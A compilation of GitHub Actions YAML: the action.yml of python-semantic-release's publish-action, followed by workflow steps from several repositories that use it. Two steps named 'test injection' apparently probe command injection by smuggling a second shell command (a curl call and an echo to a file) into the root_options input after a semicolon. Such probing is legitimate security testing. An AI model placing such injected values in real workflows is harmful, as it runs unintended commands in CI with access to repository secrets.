python-semantic-release/publish-action/action.yml
---
name: Python Semantic Release - Publish

description: Publish Artifacts & Assets to GitHub Releases

branding:
  icon: upload
  color: orange

inputs:
  directory:
    description: |
      Sub-directory to change into before running semantic-release publish
    default: "."
    required: false

  github_token:
    description: |
      GitHub token used to upload artifacts. Requires permission to create and
      edit releases.
    required: true

  root_options:
    description: |
      Additional options for the root `semantic-release` command.
      Example: -vv --noop
    required: false
    default: "-v"

  tag:
    description: |
      The tag corresponding to the GitHub Release that the artifacts should
      be published to. Defaults to 'latest', in which case the latest tag
      will be identified by Python Semantic Release and used to publish to.
    required: false

runs:
  using: docker
  image: Dockerfile

mleblebici/test-repo/.github/workflows/test.yml
- name: test injection 2
  uses: python-semantic-release/publish-action@v9.21.1
  with:
    github_token: ${{ secrets.GITHUB_TOKEN }}
    root_options: "--noop; curl https://ifconfig.me -o myip.txt"

hiroki0525/autoload_module/.github/workflows/publish-dev.yml
- name: Publish | Upload to GitHub Release Assets
  uses: python-semantic-release/publish-action@v9
  with:
    github_token: ${{ secrets.GITHUB_TOKEN }}
    tag: ${{ steps.release.outputs.tag }}
    root_options: "-vv --noop"

mleblebici/test-repo/.github/workflows/test.yml
- name: test injection 1
  uses: python-semantic-release/publish-action@v9.21.1
  with:
    github_token: ${{ secrets.GITHUB_TOKEN }}
    root_options: "--noop; echo 'INJECTED COMMAND EXECUTED' > injected.txt"

salieri-dev/kurisu/.github/workflows/release.yml
- name: Publish to GitHub Release Assets
  uses: python-semantic-release/publish-action@v10.3.1
  if: steps.release.outputs.released == 'true'
  with:
    directory: worker
    github_token: ${{ secrets.GITHUB_TOKEN }}
    tag: ${{ steps.release.outputs.tag }}